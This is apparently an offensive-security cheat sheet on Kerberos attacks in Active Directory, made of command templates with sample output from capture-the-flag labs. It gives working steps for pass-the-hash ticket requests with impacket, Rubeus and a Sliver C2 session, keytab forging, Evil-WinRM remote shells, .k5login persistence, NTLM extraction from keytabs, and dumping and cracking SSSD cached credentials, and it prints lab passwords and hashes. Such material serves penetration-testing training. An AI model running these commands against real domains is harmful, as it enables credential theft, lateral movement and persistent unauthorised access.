Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
Kerberos Ticket
1. Configure /etc/hosts
# Always in this order - DC.example.com example.com DC
sudo nxc smb <DC_IP> --generate-hosts-file /etc/hosts
Sample Output:
$ sudo nxc smb 10.129.235.149 --generate-hosts-file /etc/hosts
SMB 10.129.235.149 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
$ tail -n1 /etc/hosts
10.129.235.149 DC.administrator.htb administrator.htb DC
2. Configure /etc/krb5.conf
# Always in UPPERCASE - DC.EXAMPLE.COM
sudo nxc smb <DC_IP> --generate-krb5-file /etc/krb5.conf
Sample Output:
$ sudo nxc smb 10.129.235.149 --generate-krb5-file /etc/krb5.conf
SMB 10.129.235.149 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
$ cat /etc/krb5.conf
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = ADMINISTRATOR.HTB
[realms]
ADMINISTRATOR.HTB = {
kdc = dc.administrator.htb
admin_server = dc.administrator.htb
default_domain = administrator.htb
}
[domain_realm]
.administrator.htb = ADMINISTRATOR.HTB
administrator.htb = ADMINISTRATOR.HTB
3. Request a Ticket
# Password
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
$ sudo ntpdate -s 10.129.255.235 && impacket-getTGT 'ADMINISTRATOR.HTB/Olivia:ichliebedich' -dc-ip 10.129.255.235
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Olivia.ccache
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP>
Sample Output:
$ sudo ntpdate -s 10.129.255.235 && impacket-getTGT 'ADMINISTRATOR.HTB/Olivia' -hashes :fbaa3e2294376dc0f5aeb6b41ffa52b7 -dc-ip 10.129.255.235
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Olivia.ccache
4. Pass The Ticket
export KRB5CCNAME='<USER>.ccache'
Sample Output:
$ export KRB5CCNAME='Olivia.ccache'
5. Check
klist
Sample Output:
$ klist
Ticket cache: FILE:Olivia.ccache
Default principal: Olivia@ADMINISTRATOR.HTB
Valid starting Expires Service principal
2025-07-16T20:54:29 2025-07-17T06:54:29 krbtgt/ADMINISTRATOR.HTB@ADMINISTRATOR.HTB
renew until 2025-07-17T20:54:29
3. Installation [Optional]
sudo apt install krb5-user cifs-utils
Sample Output:
TO-DO4. Request a Ticket
sudo ntpdate -s <DC_IP> && kinit <USER>
Sample Output:
$ sudo ntpdate -s 10.129.234.139 && kinit Olivia
Password for Olivia@ADMINISTRATOR.HTB:
# Check
klist
Sample Output:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Olivia@ADMINISTRATOR.HTB
Valid starting Expires Service principal
2025-07-15T05:02:44 2025-07-15T15:02:44 krbtgt/ADMINISTRATOR.HTB@ADMINISTRATOR.HTB
renew until 2025-07-16T05:02:37
ktutil
Sample Output:
$ ktutil
ktutil:
# Domain in UPPER case
add_entry -key -p <USER>@<DOMAIN> -k 1 -e rc4-hmac
Sample Output:
ktutil: add_entry -key -p Olivia@ADMINISTRATOR.HTB -k 1 -e rc4-hmac
Key for Olivia@ADMINISTRATOR.HTB (hex):
# NTLM
<HASH>
Sample Output:
Key for Olivia@ADMINISTRATOR.HTB (hex): fbaa3e2294376dc0f5aeb6b41ffa52b7
ktutil:
write_kt <USER>.keytab
Sample Output:
ktutil: write_kt Olivia.keytab
ktutil:
exit
Sample Output:
ktutil: exit
kinit -V -k -t '<USER>.keytab' -f '<USER>@<DOMAIN>'
Sample Output:
$ kinit -V -k -t 'Olivia.keytab' -f 'Olivia@ADMINISTRATOR.HTB'
Using default cache: /tmp/krb5cc_1000
Using principal: Olivia@ADMINISTRATOR.HTB
Using keytab: Olivia.keytab
Authenticated to Kerberos v5
# Check
klist
Sample Output:
$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Olivia@ADMINISTRATOR.HTB
Valid starting Expires Service principal
2025-07-15T05:02:44 2025-07-15T15:02:44 krbtgt/ADMINISTRATOR.HTB@ADMINISTRATOR.HTB
renew until 2025-07-16T05:02:37
1. Request a Ticket
# Password
.\rubeus.exe asktgt /user:<USER> /password:'<PASSWORD>' /enctype:<ENC_TYPE> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\programdata> .\rubeus.exe asktgt /user:m.lovegod /password:'AbsoluteLDAP2022!' /enctype:AES256 /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\m.lovegod'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : m.lovegod
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:08:14 AM
EndTime : 9/24/2024 11:08:14 AM
RenewTill : 9/24/2024 11:08:14 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : aes256_cts_hmac_sha1
Base64(key) : u2ScGZUzmFdmTGETruj0VhWSGwiKTg7dbQVabz0QZU8=
ASREP (key) : 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
# NTLM
.\rubeus.exe asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\programdata> .\rubeus.exe asktgt /user:Administrator /rc4:1f4a6093623653f6488d5aa24c75f2ea /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 1f4a6093623653f6488d5aa24c75f2ea
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\Administrator'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : Administrator
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:10:55 AM
EndTime : 9/24/2024 5:10:55 PM
RenewTill : 10/1/2024 7:10:55 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : Ge3n0tM7A0k4q2bJ+0F+uA==
ASREP (key) : 1F4A6093623653F6488D5AA24C75F2EA
2. Check
klist
Sample Output:
*Evil-WinRM* PS C:\programdata> klist
Current LogonId is 0:0x2e0e9d
Cached Tickets: (2)
#0> Client: Administrator @ ABSOLUTE.HTB
Server: krbtgt/ABSOLUTE.HTB @ ABSOLUTE.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 9/24/2024 7:10:55 (local)
End Time: 9/24/2024 17:10:55 (local)
Renew Time: 10/1/2024 7:10:55 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: Administrator @ ABSOLUTE.HTB
Server: HTTP/DC.ABSOLUTE.HTB @ ABSOLUTE.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 9/24/2024 7:05:19 (local)
End Time: 9/24/2024 17:03:25 (local)
Renew Time: 0
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x8 -> ASC
Kdc Called:
1. Request a Ticket
# Password
rubeus -- 'asktgt /user:<USER> /password:<PASSWORD> /enctype:<ENC_TYPE> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap'
Sample Output:
sliver (helloworld) > rubeus -- 'asktgt /user:m.lovegod /password:AbsoluteLDAP2022! /enctype:AES256 /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap'
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Using salt: ABSOLUTE.HTBm.lovegod
[*] Using aes256_cts_hmac_sha1 hash: 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\m.lovegod'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : m.lovegod (NT_PRINCIPAL)
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:16:52 AM
EndTime : 9/24/2024 11:16:52 AM
RenewTill : 9/24/2024 11:16:52 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : aes256_cts_hmac_sha1
Base64(key) : aBhZJr9iogDKSLtohxAgie5HPBSLktIxsRYujp/MqVA=
ASREP (key) : 7455663292585851686A2C8B2DF22DCA5B0A3E84404DD480466E982E49B10554
# NTLM
rubeus -- 'asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /dc:<DC> /ptt /nowrap'
Sample Output:
sliver (helloworld) > rubeus -- 'asktgt /user:Administrator /rc4:1f4a6093623653f6488d5aa24c75f2ea /domain:ABSOLUTE.HTB /dc:DC.ABSOLUTE.HTB /ptt /nowrap'
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 1f4a6093623653f6488d5aa24c75f2ea
[*] Building AS-REQ (w/ preauth) for: 'ABSOLUTE.HTB\Administrator'
[*] Using domain controller: fe80::71ce:9b94:4962:d202%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFpDCCBa ---[SNIP]--- VURS5IVEI=
[+] Ticket successfully imported!
ServiceName : krbtgt/ABSOLUTE.HTB
ServiceRealm : ABSOLUTE.HTB
UserName : Administrator (NT_PRINCIPAL)
UserRealm : ABSOLUTE.HTB
StartTime : 9/24/2024 7:17:33 AM
EndTime : 9/24/2024 5:17:33 PM
RenewTill : 10/1/2024 7:17:33 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : BIdtxt2Rokdo+R9tNjoCLA==
ASREP (key) : 1F4A6093623653F6488D5AA24C75F2EA
2. Check
c2tc-klist
Sample Output:
sliver (helloworld) > c2tc-klist
[*] Successfully executed c2tc-klist (coff-loader)
[*] Got output:
Cached Tickets: (1)
#0> Client: Administrator @ ABSOLUTE.HTB
Server: krbtgt/ABSOLUTE.HTB @ ABSOLUTE.HTB
KerbTicket Encryption Type: (18) AES256_CTS_HMAC_SHA1_96
Ticket Flags: 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 9/24/2024 7:17:33
End Time: 9/24/2024 17:17:33
Renew Time: 10/1/2024 7:17:33
Session Key Type: (23) RC4_HMAC_NT
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
WinRM with Kerberos
1. Configure /etc/krb5.conf
# In UPPERCASE
[libdefaults]
default_realm = <DOMAIN>
[realms]
<DOMAIN> = {
kdc = <DC>:88
admin_server = <DC>
default_domain = <DOMAIN>
}
[domain_realm]
.domain.internal = <DOMAIN>
domain.internal = <DOMAIN>
Sample Output:
[libdefaults]
default_realm = ABSOLUTE.HTB
[realms]
ABSOLUTE.HTB = {
kdc = DC.ABSOLUTE.HTB:88
admin_server = DC.ABSOLUTE.HTB
default_domain = ABSOLUTE.HTB
}
[domain_realm]
.domain.internal = ABSOLUTE.HTB
domain.internal = ABSOLUTE.HTB
2. Connect
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && evil-winrm -i <TARGET> -r <DOMAIN>
Sample Output:
$ sudo ntpdate -s DC.ABSOLUTE.HTB && evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
SMB with Kerberos
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-smbclient '<DOMAIN>/<USER>@<TARGET>' -k -no-pass
Sample Output:
$ sudo ntpdate -s DC.ABSOLUTE.HTB && impacket-smbclient 'ABSOLUTE.HTB/Administrator@DC.ABSOLUTE.HTB' -k -no-pass
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
Type help for list of commands
#
Kerberos in Linux
Add Kerberos Access
echo '<USER>@<DOMAIN>' > /home/<TARGET_USER>/.k5login
Sample Output:
TO-DOExtract NTLM from Keytab
# Check
cat /etc/krb5.keytab | base64 -w0
Sample Output:
TO-DO# Extract
python3 keytabextract.py krb5.keytab
Sample Output:
$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : EXAMPLE.COM
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458
Ref: KeyTabExtract
SSSD Cached Credentials
# Config
cat /etc/sssd/sssd.conf
Sample Output:
bash-5.1# cat /etc/sssd/sssd.conf
[sssd]
domains = vigilant.vl
config_file_version = 2
services = nss, pam
[domain/vigilant.vl]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = VIGILANT.VL
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%d/%u
ad_domain = vigilant.vl
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = simple
simple_allow_users = administrator
simple_allow_groups = Domain Users
override_homedir = /home/%d/%u
enumerate = true
ldap_search_timeout = 50
ldap_enumeration_search_timeout = 60
ldap_network_timeout = 60
# Get usernames and hashes
strings /var/lib/sss/db/cache_<DOMAIN>.ldb | grep -B 10 -A 10 cachedPassword | tee result.txt
Sample Output:
TO-DO# Filter hashes
cat result.txt | grep -E '^\$' | sort | uniq | tee hashes
Sample Output:
TO-DO# Crack hashes
hashcat -m 1800 -a 0 hashes /usr/share/wordlists/rockyou.txt --force
Sample Output:
TO-DO